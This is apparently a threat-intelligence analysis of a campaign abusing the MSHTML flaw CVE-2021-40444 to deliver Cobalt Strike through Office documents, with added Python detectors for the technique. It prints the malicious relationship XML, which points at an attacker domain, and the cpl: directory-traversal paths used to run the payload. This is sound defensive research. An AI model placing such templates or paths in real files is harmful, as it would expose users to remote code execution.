Overview
MSHTML (Microsoft HTML) engine, also known as Trident, is the browser engine Microsoft developed for Internet Explorer. The Microsoft Office suite also embeds MSHTML, and threat actors are abusing this to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then loaded by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML. These malicious documents are delivered via Office 365. By default, documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user bypasses these mitigations and enables the content, the target machine is exploited and malware agents such as the Cobalt Strike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning that reads “Suspicious Cpl File Execution.” Given the quality of the vulnerability research and the scale at which users are being targeted, an advanced adversary is most likely responsible for the ongoing campaign. The CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries leveraging the MSHTML RCE bug, in order to provide better security for our clients. This report provides a technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse, as a large number of systems remain susceptible.

Remote Template Injection Technique
Microsoft Word and Excel documents are an archived (ZIP) collection of XML files that retain the information and data the user entered while creating the document in the corresponding Office application. In simple words, one can unzip a .docx file to see the internal XML files that hold the various metadata. The directory word/_rels in the unzipped Word/Excel file plays a very significant role in weaponizing a seemingly benign document. The relationship file recovered from the analysed document is reproduced below; the oleObject relationship rId6 is the one whose external target is an mhtml: URL pointing at side.html:

    <?xml version="1.0" encoding="UTF-8" standalone="true"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/>
      <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/>
      <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/>
      <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/>
      <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/>
      <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/>
      <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/>
      <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/>
    </Relationships>
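A defender-side scan for the relationship pattern described above, added here as an example and not part of the original report or the analysed sample: it unzips a document in memory, walks every .rels part, and reports oleObject relationships whose TargetMode is External (the malicious.example domain and the in-memory .docx are constructed placeholders, not the campaign's values).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Package-relationship namespace and the oleObject relationship type used in the document above.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_external_ole_relationships(docx_bytes):
    """Return (part, rId, target) for every oleObject relationship whose target is
    External, i.e. resolved over the network when the document is opened."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_TYPE and rel.get("TargetMode", "Internal") == "External":
                    hits.append((part, rel.get("Id"), rel.get("Target")))
    return hits


def is_mhtml_target(target):
    """True when the target uses the mhtml: scheme (the form seen in the analysed document)."""
    return target.lower().startswith("mhtml:")


def build_docx(rels_xml):
    """Build a constructed, minimal .docx containing only the relationship part we scan."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample relationships: placeholder domain, same shape as the analysed document.
MALICIOUS_URL = "mhtml:http://malicious.example/side.html!x-usc:http://malicious.example/side.html"
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId6" Type="{OLE_TYPE}" TargetMode="External" Target="{MALICIOUS_URL}"/>'
    "</Relationships>"
)
# Benign variant: the same oleObject relationship, but pointing at an embedded part inside the package.
BENIGN_RELS = MALICIOUS_RELS.replace('TargetMode="External" ', "").replace(MALICIOUS_URL, "embeddings/oleObject1.bin")
```

Run `find_external_ole_relationships(build_docx(MALICIOUS_RELS))` to see the flagged rId6 entry; a real document is scanned the same way by passing its bytes.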
Exploitation
The malicious webpage side.html fetched by the document contains heavily obfuscated JavaScript that exploits CVE-2021-40444, a vulnerability with no official patch at the time of writing this report. Execution of this stage leads to retrieval of the final payload for command and control.

Cobalt Strike Beacon
A basic image analysis shows that the championship.inf file is, in fact, a 64-bit DLL (Dynamic Link Library): its first bytes are the “MZ” header. A CPL file is a Control Panel item, and it has code execution capabilities. A DLL becomes a CPL when it exports a particular function called CplApplet, after which it can be readily executed like any PE (Portable Executable).

Dynamic Analysis of the Exploit
When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result is a Cobalt Strike beacon, as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found a few interesting results, which are shared below.

Loading of Vulnerable Module
The Microsoft Word application loads mshtml.dll from the Windows directory. The vulnerability resides in one of the functions defined in this DLL.

File Writing
The final payload championship.inf is extracted from the initial ministry.cab archive and written to the Temp directory. This is probably the result of the vulnerability being abused by adversaries to write user-controlled data to disk.

Code Execution
CloudSEK researchers also identified multiple control.exe processes spawned to execute the CPL payload. Each of these processes searches for the championship.inf file in directories that are hardcoded in the exploit. Here is the list of the hardcoded paths to which the payload is dropped:

    cpl:../../../AppData/Local/Temp/Low/championship.inf
    .cpl:../../../AppData/Local/Temp/championship.inf
    cpl:../../../../AppData/Local/Temp/Low/championship.inf
    cpl:../../../../AppData/Local/Temp/championship.inf
    .cpl:../../../../../Temp/Low/championship.inf
    .cpl:../../../../../Temp/championship.inf
    .cpl:../../Low/championship.inf
    .cpl:../../championship.inf
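Detection logic for the process behaviour described in this section, added here as an example and not part of the original report: it triages process-creation events for control.exe launched by an Office host with a cpl: argument that traverses directories to a non-.cpl file under Temp. The events are constructed samples in Sysmon / Process Monitor style, and the office host list is an assumption.

```python
import re

# Office host processes that should not normally launch control.exe with a cpl: argument (assumed list).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Matches the "cpl:<path>" argument form (with or without the leading dot) passed to control.exe.
CPL_ARG = re.compile(r'\.?cpl:(?P<path>[^"\s,]+)', re.IGNORECASE)


def classify(event):
    """Return the list of reasons a process-creation event looks like CVE-2021-40444
    post-exploitation (control.exe loading a traversal-path .inf), or None if it does not."""
    if not event["image"].lower().endswith("\\control.exe"):
        return None
    m = CPL_ARG.search(event["cmdline"])
    if m is None:
        return None
    path = m.group("path").replace("\\", "/")
    reasons = []
    if event["parent"].rsplit("\\", 1)[-1].lower() in OFFICE_HOSTS:
        reasons.append("control.exe spawned by an Office application")
    if "../" in path:
        reasons.append("cpl: argument uses directory traversal")
    if not path.lower().endswith(".cpl"):
        reasons.append("cpl: argument points at a non-.cpl file: " + path.rsplit("/", 1)[-1])
    if "/temp/" in "/" + path.lower():
        reasons.append("target lives under a Temp directory")
    return reasons or None


def triage(events):
    """Return {event index: reasons} for every event that matched."""
    flagged = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed process-creation events (Sysmon EID 1 / Process Monitor style), not the report's own data.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" ".cpl:../../../AppData/Local/Temp/Low/championship.inf",'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" ".cpl:../../championship.inf",'},
    {"parent": r"C:\Windows\explorer.exe",  # legitimate Control Panel launch, should not match
     "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" timedate.cpl'},
]
```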
Guidelines
Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
- Disable ActiveX via Group Policy
- Disable ActiveX on individual systems via the registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should select detection build 1.349.22.0
Indicators of Compromise (IOCs)